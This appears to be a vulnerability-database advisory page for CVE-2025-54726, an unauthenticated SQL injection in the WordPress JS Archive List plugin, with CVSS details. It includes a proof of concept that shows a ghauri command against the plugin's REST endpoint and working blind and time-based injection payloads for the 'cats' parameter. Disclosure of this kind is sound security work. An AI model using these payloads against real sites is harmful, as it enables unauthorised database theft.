| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2025-54726 | 25 Sep 202513:36 | – | circl | |
| WordPress plugin JS Archive List SQL注入漏洞 | 20 Aug 202500:00 | – | cnnvd | |
| CVE-2025-54726 | 20 Aug 202508:02 | – | cve | |
| CVE-2025-54726 WordPress JS Archive List Plugin < 6.1.6 - SQL Injection Vulnerability | 20 Aug 202508:02 | – | cvelist | |
| Exploit for CVE-2025-54726 | 25 Sep 202515:36 | – | githubexploit | |
| EUVD-2025-28565 | 3 Oct 202520:07 | – | euvd | |
| WordPress JS Archive List <= 6.1.5 - SQL Injection | 4 Jun 202603:48 | – | nuclei | |
| CVE-2025-54726 | 20 Aug 202508:15 | – | nvd | |
| WordPress JS Archive List Plugin < 6.1.6 - SQL Injection Vulnerability | 27 Aug 202516:15 | – | patchstack | |
| PT-2025-34022 | 20 Aug 202500:00 | – | ptsecurity |
# CVE-2025-54726
JS Archive List <= 6.1.5 - Unauthenticated SQL Injection
# Description
The JS Archive List plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 6.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
## Details
- **Type**: plugin
- **Slug**: jquery-archive-list-widget
- **Affected Version**: 6.1.5
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-54726
- **Status**: Active
POC
---
```
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"
________.__ .__ {1.4.1}
/ _____/| |__ _____ __ _________|__|
/ \ ___| | \\__ \ | | \_ __ \ |
\ \_\ \ Y \/ __ \| | /| | \/ |
\______ /___| (____ /____/ |__| |__|
\/ \/ \/ https://github.com/r0oth3x49
An advanced SQL injection detection & exploitation tool.
[*] starting @ 16:39:05 /2025-09-25/
[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cats=1 AND 01609=1609&exclusionType=exclude
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation